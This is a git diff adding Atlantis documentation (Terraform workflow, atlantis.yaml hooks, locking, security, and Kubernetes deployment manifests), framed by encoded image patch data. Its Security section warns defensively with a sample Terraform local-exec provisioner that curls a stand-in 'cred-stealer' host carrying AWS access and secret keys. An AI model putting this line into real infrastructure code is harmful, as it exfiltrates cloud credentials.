zj3+3LZ5od*?TFn}59LDxcI&zC=ZEeeOK1O&tMpa%zW02_km7VGVEyNvUs+djFoz%1 zr3T1n=U3J}y|6WMooyLEXhs`*(Yv-~{9s{g*CY=-*8j=GSmvLckLkJt z(~!F(A^Y1q9_cC?y<02h#VYsBKR@*OWXAcP>#9#QT9$fX81g{aHoyDKSJpk*Xj$fk z0RU`y^0>S-GPX72xc|*@)wPY5rxuuoJZPK7e_s#_{qph8ubdan-@Gw^asKOzgYxi+ z3lC2zU8`ltJ1piy$u_H z6k^CQ#4jU3`-j^f>Dt$5d1hl?8^Ab!x$A83#M$A8QW a single directory of Terraform configuration to be used to manage multiple distinct sets of infrastructure resources + +If you're using a Terraform version >= 0.9.0, Atlantis supports workspaces through the `-w` flag. +For example, +``` +atlantis plan -w staging +``` + +If a workspace is specified, Atlantis will use `terraform workspace select {workspace}` prior to running `terraform plan` or `terraform apply`. + +If you're using the `env/{env}.tfvars` [project structure](#project-structure) we will also append `-var-file=env/{env}.tfvars` to `plan` and `apply`. + +If no workspace is specified, we'll use the `default` workspace by default. +This replicates Terraform's default behaviour which also uses the `default` workspace. + +## Terraform Versions +By default, Atlantis will use the `terraform` executable that is in its path. To use a specific version of Terraform just install that version on the server that Atlantis is running on. + +If you would like to use a different version of Terraform for some projects but not for others +1. Install the desired version of Terraform into the `$PATH` of where Atlantis is running and name it `terraform{version}`, ex. `terraform0.8.8`. +2. In the project root (which is not necessarily the repo root) of any project that needs a specific version, create an `atlantis.yaml` file as follows +``` +--- +terraform_version: 0.8.8 # set to desired version +``` + +So your project structure will look like +``` +. +├── main.tf +└── atlantis.yaml +``` +Now when Atlantis executes it will use the `terraform{version}` executable. + +## Project-Specific Customization +An `atlantis.yaml` config file in your project root (which is not necessarily the repo root) can be used to customize +- what commands Atlantis runs **before** `init`, `get`, `plan` and `apply` with `pre_init`, `pre_get`, `pre_plan` and `pre_apply` +- what commands Atlantis runs **after** `plan` and `apply` with `post_plan` and `post_apply` +- additional arguments to be supplied to specific terraform commands with `extra_arguments` + - the commmands that we support adding extra args to are `init`, `get`, `plan` and `apply` +- what version of Terraform to use (see [Terraform Versions](#terraform-versions)) + +The schema of the `atlantis.yaml` project config file is + +```yaml +# atlantis.yaml +--- +terraform_version: 0.8.8 # optional version +# pre_init commands are run when the Terraform version is >= 0.9.0 +pre_init: + commands: + - "curl http://example.com" +# pre_get commands are run when the Terraform version is < 0.9.0 +pre_get: + commands: + - "curl http://example.com" +pre_plan: + commands: + - "curl http://example.com" +post_plan: + commands: + - "curl http://example.com" +pre_apply: + commands: + - "curl http://example.com" +post_apply: + commands: + - "curl http://example.com" +extra_arguments: + - command_name: plan + arguments: + - "-var-file=terraform.tfvars" +``` + +When running the `pre_plan`, `post_plan`, `pre_apply`, and `post_apply` commands the following environment variables are available +- `WORKSPACE`: if a workspace argument is supplied to `atlantis plan` or `atlantis apply`, ex `atlantis plan -w staging`, this will +be the value of that argument. Else it will be `default` +- `ATLANTIS_TERRAFORM_VERSION`: local version of `terraform` or the version from `terraform_version` if specified, ex. `0.8.8` +- `DIR`: absolute path to the root of the project on disk + +## Locking +When `plan` is run, the [project](#project) and [workspace](#workspaceenvironment) (**but not the whole repo**) are **Locked** until an `apply` succeeds **and** the pull request/merge request is merged. +This protects against concurrent modifications to the same set of infrastructure and prevents +users from seeing a `plan` that will be invalid if another pull request is merged. + +If you have multiple directories inside a single repository, only the directory will be locked. Not the whole repo. + +To unlock the project and workspace without completing an `apply` and merging, click the link +at the bottom of the plan comment to discard the plan and delete the lock. +Once a plan is discarded, you'll need to run `plan` again prior to running `apply` when you go back to that pull request. + +## Approvals +If you'd like to require pull/merge requests to be approved prior to a user running `atlantis apply` simply run Atlantis with the `--require-approval` flag. +By default, no approval is required. + +For more information on GitHub pull request reviews and approvals see: https://help.github.com/articles/about-pull-request-reviews/ + +For more information on GitLab merge request reviews and approvals (only supported on GitLab Enterprise) see: https://docs.gitlab.com/ee/user/project/merge_requests/merge_request_approvals.html. + +## Security +Because you usually run Atlantis on a server with credentials that allow access to your infrastructure it's important that you deploy Atlantis securely. + +Atlantis could be exploited by +* Running `terraform apply` on a malicious Terraform file with [local-exec](https://www.terraform.io/docs/provisioners/local-exec.html) +```tf +resource "null_resource" "null" { + provisioner "local-exec" { + command = "curl https://cred-stealer.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY" + } +} +``` +* Running malicious hook commands specified in an `atlantis.yaml` file. +* Someone adding `atlantis plan/apply` comments on your valid pull requests causing terraform to run when you don't want it to. + +### Mitigations +#### Don't Use On Public Repos +Because anyone can comment on public pull requests, even with all the security mitigations available, it's still dangerous to run Atlantis on public repos until Atlantis gets an authentication system. + +#### Don't Use `--allow-fork-prs` +If you're running on a public repo (which isn't recommended, see above) you shouldn't set `--allow-fork-prs` (defaults to false) +because anyone can open up a pull request from their fork to your repo. + +#### `--repo-whitelist` +Atlantis requires you to specify a whitelist of repositories it will accept webhooks from via the `--repo-whitelist` flag. +For example: +* Specific repositories: `--repo-whitelist=github.com/runatlantis/atlantis,github.com/runatlantis/atlantis-tests` +* Your whole organization: `--repo-whitelist=github.com/runatlantis/*` +* Every repository in your GitHub Enterprise install: `--repo-whitelist=github.yourcompany.com/*` +* All repositories: `--repo-whitelist=*`. Useful for when you're in a protected network but dangerous without also setting a webhook secret. + +This flag ensures your Atlantis install isn't being used with repositories you don't control. See `atlantis server --help` for more details. + +#### Webhook Secrets +Atlantis should be run with Webhook secrets set via the `$ATLANTIS_GH_WEBHOOK_SECRET`/`$ATLANTIS_GITLAB_WEBHOOK_SECRET` environment variables. +Even with the `--repo-whitelist` flag set, without a webhook secret, attackers could make requests to Atlantis posing as a repository that is whitelisted. +Webhook secrets ensure that the webhook requests are actually coming from your VCS provider (GitHub or GitLab). + + +## Server Configuration +Configuration for `atlantis server` can be specified via command line flags, environment variables or a YAML config file. +Config file values are overridden by environment variables which in turn are overridden by flags. + +### YAML +To use a yaml config file, run atlantis with `--config /path/to/config.yaml`. +The keys of your config file should be the same as the flag, ex. +```yaml +--- +gh-token: ... +log-level: ... +``` + +### Environment Variables +All flags can be specified as environment variables. You need to convert the flag's `-`'s to `_`'s, uppercase all the letters and prefix with `ATLANTIS_`. +For example, `--gh-user` can be set via the environment variable `ATLANTIS_GH_USER`. + +To see a list of all flags and their descriptions run `atlantis server --help` + +## AWS Credentials +Atlantis simply shells out to `terraform` so you don't need to do anything special with AWS credentials. +As long as `terraform` works where you're hosting Atlantis, then Atlantis will work. +See https://www.terraform.io/docs/providers/aws/#authentication for more detail. + +### Multiple AWS Accounts +Atlantis supports multiple AWS accounts through the use of Terraform's +[AWS Authentication](https://www.terraform.io/docs/providers/aws/#authentication). + +If you're using the [Shared Credentials file](https://www.terraform.io/docs/providers/aws/#shared-credentials-file) +you'll need to ensure the server that Atlantis is executing on has the corresponding credentials file. + +If you're using [Assume role](https://www.terraform.io/docs/providers/aws/#assume-role) +you'll need to ensure that the credentials file has a `default` profile that is able +to assume all required roles. + +[Environment variables](https://www.terraform.io/docs/providers/aws/#environment-variables) authentication +won't work for multiple accounts since Atlantis wouldn't know which environment variables to execute +Terraform with. + +### Assume Role Session Names +Atlantis injects the Terraform variable `atlantis_user` and sets it to the GitHub username of +the user that is running the Atlantis command. This can be used to dynamically name the assume role +session. This is used at Hootsuite so AWS API actions can be correlated with a specific user. + +To take advantage of this feature, use Terraform's [built-in support](https://www.terraform.io/docs/providers/aws/#assume-role) for assume role +and use the `atlantis_user` terraform variable + +```hcl +provider "aws" { + assume_role { + role_arn = "arn:aws:iam::ACCOUNT_ID:role/ROLE_NAME" + session_name = "${var.atlantis_user}" + } +} + +# need to define the atlantis_user variable to avoid terraform errors +variable "atlantis_user" { + default = "atlantis_user" +} +``` + +If you're also using the [S3 Backend](https://www.terraform.io/docs/backends/types/s3.html) +make sure to add the `role_arn` option: + +```hcl +terraform { + backend "s3" { + bucket = "mybucket" + key = "path/to/my/key" + region = "us-east-1" + role_arn = "arn:aws:iam::ACCOUNT_ID:role/ROLE_NAME" + # can't use var.atlantis_user as the session name because + # interpolations are not allowed in backend configuration + # session_name = "${var.atlantis_user}" WON'T WORK + } +} +``` + +Terraform doesn't support interpolations in backend config so you will not be +able to use `session_name = "${var.atlantis_user}"`. However, the backend assumed +role is only used for state-related API actions. Any other API actions will be performed using +the assumed role specified in the `aws` provider and will have the session named as the GitHub user. + +## Glossary +#### Project +A Terraform project. Multiple projects can be in a single GitHub repo. +We identify a project by its repo **and** the path to the root of the project within that repo. + +#### Workspace/Environment +A Terraform workspace. See [terraform docs](https://www.terraform.io/docs/state/workspaces.html) for more information. + +## FAQ +**Q: Does Atlantis affect Terraform [remote state](https://www.terraform.io/docs/state/remote.html)?** + +A: No. Atlantis does not interfere with Terraform remote state in any way. Under the hood, Atlantis is simply executing `terraform plan` and `terraform apply`. + +**Q: How does Atlantis locking interact with Terraform [locking](https://www.terraform.io/docs/state/locking.html)?** + +A: Atlantis provides locking of pull requests that prevents concurrent modification of the same infrastructure (Terraform project) whereas Terraform locking only prevents two concurrent `terraform apply`'s from happening. + +Terraform locking can be used alongside Atlantis locking since Atlantis is simply executing terraform commands. + +**Q: How to run Atlantis in high availability mode? Does it need to be?** + +A: Atlantis server can easily be run under the supervision of a init system like `upstart` or `systemd` to make sure `atlantis server` is always running. + +Atlantis currently stores all locking and Terraform plans locally on disk under the `--data-dir` directory (defaults to `~/.atlantis`). Because of this there is currently no way to run two or more Atlantis instances concurrently. + +However, if you were to lose the data, all you would need to do is run `atlantis plan` again on the pull requests that are open. If someone tries to run `atlantis apply` after the data has been lost then they will get an error back, so they will have to re-plan anyway. + +**Q: How to add SSL to Atlantis server?** + +A: First, you'll need to get a public/private key pair to serve over SSL. +These need to be in a directory accessible by Atlantis. Then start `atlantis server` with the `--ssl-cert-file` and `--ssl-key-file` flags. +See `atlantis server --help` for more information. + +**Q: How can I get Atlantis up and running on AWS?** + +A: There is [terraform-aws-atlantis](https://github.com/terraform-aws-modules/terraform-aws-atlantis) project where complete Terraform configurations for running Atlantis on AWS Fargate are hosted. Tested and maintained. + +## Contributing +Want to contribute? Check out [CONTRIBUTING](https://github.com/runatlantis/atlantis/blob/master/CONTRIBUTING.md). + +## Credits +Atlantis was originally developed at [Hootsuite](https://hootsuite.com) under [hootsuite/atlantis](https://github.com/hootsuite/atlantis). The maintainers are indebted to Hootsuite for supporting the creation and continued development of this project over the last 2 years. The Hootsuite values of building a better way and teamwork made this project possible, alongside constant encouragement and assistance from our colleagues. + +NOTE: We had to remove the "fork" label because otherwise code searches don't work. + +Thank you to these awesome contributors! +- [@nicholas-wu-hs](https://github.com/nicholas-wu-hs) +- [@nadavshatz](https://github.com/nadavshatz) +- [@jwieringa](https://github.com/jwieringa) +- [@suhussai](https://github.com/suhussai) +- [@mootpt](https://github.com/mootpt) +- [@codec](https://github.com/codec) +- [@nick-hollingsworth-hs](https://github.com/nick-hollingsworth-hs) +- [@mpmsimo](https://github.com/mpmsimo) +- [@hussfelt](https://github.com/hussfelt) +- [@psalaberria002](https://github.com/psalaberria002) + +* Atlantis Logo: Icon made by [freepik](https://www.flaticon.com/authors/freepik) from www.flaticon.com + diff --git a/runatlantis.io/docs/deployment.md b/runatlantis.io/docs/deployment.md new file mode 100644 index 0000000000..cc6e5b1e08 --- /dev/null +++ b/runatlantis.io/docs/deployment.md @@ -0,0 +1,374 @@ +# Production-Ready Deployment +[[toc]] +## Install Terraform +`terraform` needs to be in the `$PATH` for Atlantis. +Download from https://www.terraform.io/downloads.html +```bash +unzip path/to/terraform_*.zip -d /usr/local/bin +``` +Check that it's in your `$PATH` +``` +$ terraform version +Terraform v0.10.0 +``` +If you want to use a different version of Terraform see [Terraform Versions](#terraform-versions) + +## Hosting Atlantis +Atlantis needs to be hosted somewhere that github.com/gitlab.com or your GitHub/GitLab Enterprise installation can reach. Developers in your organization also need to be able to access Atlantis to view the UI and to delete locks. + +By default Atlantis runs on port `4141`. This can be changed with the `--port` flag. + +## Add GitHub Webhook +Once you've decided where to host Atlantis you can add it as a Webhook to GitHub. +If you already have a GitHub organization we recommend installing the webhook at the **organization level** rather than on each repository, however both methods will work. + +::: tip +If you're not sure if you have a GitHub organization see https://help.github.com/articles/differences-between-user-and-organization-accounts/ +::: + +If you're installing on the organization, navigate to your organization's page and click **Settings**. +If installing on a single repository, navigate to the repository home page and click **Settings**. +- Select **Webhooks** or **Hooks** in the sidebar +- Click **Add webhook** +- set **Payload URL** to `http://$URL/events` where `$URL` is where Atlantis is hosted. **Be sure to add `/events`** +- set **Content type** to `application/json` +- set **Secret** to a random key (https://www.random.org/strings/). You'll need to pass this value to the `--gh-webhook-secret` option when you start Atlantis +- select **Let me select individual events** +- check the boxes + - **Pull request reviews** + - **Pushes** + - **Issue comments** + - **Pull requests** +- leave **Active** checked +- click **Add webhook** + +## Add GitLab Webhook +If you're using GitLab, navigate to your project's home page in GitLab +- Click **Settings > Integrations** in the sidebar +- set **URL** to `http://$URL/events` where `$URL` is where Atlantis is hosted. **Be sure to add `/events`** +- leave **Secret Token** blank or set this to a random key (https://www.random.org/strings/). If you set it, you'll need to use the `--gitlab-webhook-secret` option when you start Atlantis +- check the boxes + - **Push events** + - **Comments** + - **Merge Request events** +- leave **Enable SSL verification** checked +- click **Add webhook** + +## Create a GitHub Token +We recommend creating a new user in GitHub named **atlantis** that performs all API actions, however you can use any user. + +**NOTE: The Atlantis user must have "Write permissions" (for repos in an organization) or be a "Collaborator" (for repos in a user account) to be able to set commit statuses:** +![Atlantis status](./images/status.png) + +Once you've created the user (or have decided to use an existing user) you need to create a personal access token. +- follow [https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/#creating-a-token](https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/#creating-a-token) +- copy the access token + +## Create a GitLab Token +We recommend creating a new user in GitLab named **atlantis** that performs all API actions, however you can use any user. +Once you've created the user (or have decided to use an existing user) you need to create a personal access token. +- follow [https://docs.gitlab.com/ce/user/profile/personal_access_tokens.html#creating-a-personal-access-token](https://docs.gitlab.com/ce/user/profile/personal_access_tokens.html#creating-a-personal-access-token) +- create a token with **api** scope +- copy the access token + +## Start Atlantis +Now you're ready to start Atlantis! + +If you're using GitHub, run: +``` +$ atlantis server --atlantis-url $URL --gh-user $USERNAME --gh-token $TOKEN --gh-webhook-secret $SECRET +2049/10/6 00:00:00 [WARN] server: Atlantis started - listening on port 4141 +``` + +If you're using GitLab, run: +``` +$ atlantis server --atlantis-url $URL --gitlab-user $USERNAME --gitlab-token $TOKEN --gitlab-webhook-secret $SECRET +2049/10/6 00:00:00 [WARN] server: Atlantis started - listening on port 4141 +``` + +- `$URL` is the URL that Atlantis can be reached at +- `$USERNAME` is the GitHub/GitLab username you generated the token for +- `$TOKEN` is the access token you created. If you don't want this to be passed in as an argument for security reasons you can specify it in a config file (see [Configuration](#configuration)) or as an environment variable: `ATLANTIS_GH_TOKEN` or `ATLANTIS_GITLAB_TOKEN` +- `$SECRET` is the random key you used for the webhook secret. If you left the secret blank then don't specify this flag. If you don't want this to be passed in as an argument for security reasons you can specify it in a config file (see [Configuration](#configuration)) or as an environment variable: `ATLANTIS_GH_WEBHOOK_SECRET` or `ATLANTIS_GITLAB_WEBHOOK_SECRET` + +Atlantis is now running! +**We recommend running it under something like Systemd or Supervisord.** + +## Docker +Atlantis also ships inside a docker image. Run the docker image: + +```bash +docker run runatlantis/atlantis:latest server +``` + +### Usage +If you need to modify the Docker image that we provide, for instance to add a specific version of Terraform, you can do something like this: + +* Create a custom docker file +```bash +vim Dockerfile-custom +``` + +```dockerfile +FROM runatlantis/atlantis + +# copy a terraform binary of the version you need +COPY terraform /usr/local/bin/terraform +``` + +* Build docker image + +```bash +docker build -t {YOUR_DOCKER_ORG}/atlantis-custom -f Dockerfile-custom . +``` + +* Run docker image + +```bash +docker run {YOUR_DOCKER_ORG}/atlantis-custom server --gh-user=GITHUB_USERNAME --gh-token=GITHUB_TOKEN +``` + +## Kubernetes +Atlantis can be deployed into Kubernetes as a +[Deployment](https://kubernetes.io/docs/concepts/workloads/controllers/deployment/) +or as a [Statefulset](https://kubernetes.io/docs/concepts/workloads/controllers/statefulset/) with persistent storage. + +StatefulSet is recommended because Atlantis stores its data on disk and so if your Pod dies +or you upgrade Atlantis, you won't lose the data. On the other hand, the only data that +Atlantis has right now is any plans that haven't been applied and Atlantis locks. If +Atlantis loses that data, you just need to run `atlantis plan` again so it's not the end of the world. + +Regardless of whether you choose a Deployment or StatefulSet, first create a Secret with the webhook secret and access token: +``` +echo -n "yourtoken" > token +echo -n "yoursecret" > webhook-secret +kubectl create secret generic atlantis-vcs --from-file=token --from-file=webhook-secret +``` + +Next, edit the manifests below as follows: +1. Replace `` in `image: runatlantis/atlantis:` with the most recent version from https://github.com/runatlantis/atlantis/releases/latest. + * NOTE: You never want to run with `:latest` because if your Pod moves to a new node, Kubernetes will pull the latest image and you might end +up upgrading Atlantis by accident! +2. Replace `value: github.com/yourorg/*` under `name: ATLANTIS_REPO_WHITELIST` with the whitelist pattern +for your Terraform repos. See [--repo-whitelist](#--repo-whitelist) for more details. +3. If you're using GitHub: + 1. Replace `` with the username of your Atlantis GitHub user without the `@`. + 2. Delete all the `ATLANTIS_GITLAB_*` environment variables. +4. If you're using GitLab: + 1. Replace `` with the username of your Atlantis GitLab user without the `@`. + 2. Delete all the `ATLANTIS_GH_*` environment variables. + +### StatefulSet Manifest +

+ Show... + +```yaml +apiVersion: apps/v1 +kind: StatefulSet +metadata: + name: atlantis +spec: + serviceName: atlantis + replicas: 1 + updateStrategy: + type: RollingUpdate + rollingUpdate: + partition: 0 + selector: + matchLabels: + app: atlantis + template: + metadata: + labels: + app: atlantis + spec: + securityContext: + fsGroup: 1000 # Atlantis group (1000) read/write access to volumes. + containers: + - name: atlantis + image: runatlantis/atlantis:v # 1. Replace with the most recent release. + env: + - name: ATLANTIS_REPO_WHITELIST + value: github.com/yourorg/* # 2. Replace this with your own repo whitelist. + + ## GitHub Config ### + - name: ATLANTIS_GH_USER + value: # 3i. If you're using GitHub replace with the username of your Atlantis GitHub user without the `@`. + - name: ATLANTIS_GH_TOKEN + valueFrom: + secretKeyRef: + name: atlantis-vcs + key: token + - name: ATLANTIS_GH_WEBHOOK_SECRET + valueFrom: + secretKeyRef: + name: atlantis-vcs + key: webhook-secret + + ## GitLab Config ### + - name: ATLANTIS_GITLAB_USER + value: # 4i. If you're using GitLab replace with the username of your Atlantis GitLab user without the `@`. + - name: ATLANTIS_GITLAB_TOKEN + valueFrom: + secretKeyRef: + name: atlantis-vcs + key: token + - name: ATLANTIS_GITLAB_WEBHOOK_SECRET + valueFrom: + secretKeyRef: + name: atlantis-vcs + key: webhook-secret + + - name: ATLANTIS_DATA_DIR + value: /atlantis + - name: ATLANTIS_PORT + value: "4141" # Kubernetes sets an ATLANTIS_PORT variable so we need to override. + volumeMounts: + - name: atlantis-data + mountPath: /atlantis + ports: + - name: atlantis + containerPort: 4141 + resources: + requests: + memory: 256Mi + cpu: 100m + limits: + memory: 256Mi + cpu: 100m + volumeClaimTemplates: + - metadata: + name: atlantis-data + spec: + accessModes: ["ReadWriteOnce"] # Volume should not be shared by multiple nodes. + resources: + requests: + # The biggest thing Atlantis stores is the Git repo when it checks it out. + # It deletes the repo after the pull request is merged. + storage: 5Gi +--- +apiVersion: v1 +kind: Service +metadata: + name: atlantis +spec: + ports: + - name: atlantis + port: 80 + targetPort: 4141 + selector: + app: atlantis +``` +
+ + +### Deployment Manifest +
+ Show... + +```yaml +apiVersion: apps/v1 +kind: Deployment +metadata: + name: atlantis + labels: + app: atlantis +spec: + replicas: 1 + selector: + matchLabels: + app: atlantis + template: + metadata: + labels: + app: atlantis + spec: + containers: + - name: atlantis + image: runatlantis/atlantis:v # 1. Replace with the most recent release. + env: + - name: ATLANTIS_REPO_WHITELIST + value: github.com/yourorg/* # 2. Replace this with your own repo whitelist. + + ## GitHub Config ### + - name: ATLANTIS_GH_USER + value: # 3i. If you're using GitHub replace with the username of your Atlantis GitHub user without the `@`. + - name: ATLANTIS_GH_TOKEN + valueFrom: + secretKeyRef: + name: atlantis-vcs + key: token + - name: ATLANTIS_GH_WEBHOOK_SECRET + valueFrom: + secretKeyRef: + name: atlantis-vcs + key: webhook-secret + + ## GitLab Config ### + - name: ATLANTIS_GITLAB_USER + value: # 4i. If you're using GitLab replace with the username of your Atlantis GitLab user without the `@`. + - name: ATLANTIS_GITLAB_TOKEN + valueFrom: + secretKeyRef: + name: atlantis-vcs + key: token + - name: ATLANTIS_GITLAB_WEBHOOK_SECRET + valueFrom: + secretKeyRef: + name: atlantis-vcs + key: webhook-secret + - name: ATLANTIS_PORT + value: "4141" # Kubernetes sets an ATLANTIS_PORT variable so we need to override. + ports: + - name: atlantis + containerPort: 4141 + resources: + requests: + memory: 256Mi + cpu: 100m + limits: + memory: 256Mi + cpu: 100m +--- +apiVersion: v1 +kind: Service +metadata: + name: atlantis +spec: + ports: + - name: atlantis + port: 80 + targetPort: 4141 + selector: + app: atlantis +``` +
+ +### Routing and SSL +The manifests above create a Kubernetes `Service` of type `ClusterIP` which isn't accessible outside your cluster. +Depending on how you're doing routing into Kubernetes, you may want to use a `LoadBalancer` so that Atlantis is accessible +to GitHub/GitLab and your internal users. + +If you want to add SSL you can use something like https://github.com/jetstack/cert-manager to generate SSL +certs and mount them into the Pod. Then set the `ATLANTIS_SSL_CERT_FILE` and `ATLANTIS_SSL_KEY_FILE` environment variables to enable SSL. +You could also set up SSL at your LoadBalancer. + +## AWS Fargate + +If you'd like to run Atlantis on [AWS Fargate](https://aws.amazon.com/fargate/) check out the Atlantis module on the Terraform Module Registry: https://registry.terraform.io/modules/terraform-aws-modules/atlantis/aws + +## Testing Out Atlantis on GitHub + +If you'd like to test out Atlantis before running it on your own repositories you can fork our example repo. + +- Fork https://github.com/runatlantis/atlantis-example +- If you didn't add the Webhook as to your organization add Atlantis as a Webhook to the forked repo (see [Add GitHub Webhook](#add-github-webhook)) +- Now that Atlantis can receive events you should be able to comment on a pull request to trigger Atlantis. Create a pull request + - Click **Branches** on your forked repo's homepage + - click the **New pull request** button next to the `example` branch + - Change the `base` to `{your-repo}/master` + - click **Create pull request** +- Now you can test out Atlantis + - Create a comment `atlantis help` to see what commands you can run from the pull request + - `atlantis plan` will run `terraform plan` behind the scenes. You should see the output commented back on the pull request. You should also see some logs show up where you're running `atlantis server` + - `atlantis apply` will run `terraform apply`. Since our pull request creates a `null_resource` (which does nothing) this is safe to do. \ No newline at end of file diff --git a/runatlantis.io/docs/getting-started.md b/runatlantis.io/docs/getting-started.md new file mode 100644 index 0000000000..e69de29bb2 diff --git a/runatlantis.io/docs/images/atlantis-logo.png b/runatlantis.io/docs/images/atlantis-logo.png new file mode 100644 index 0000000000000000000000000000000000000000..748e26771af638c3dea9a2c31626213b7e43bf38 GIT binary patch literal 14750 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 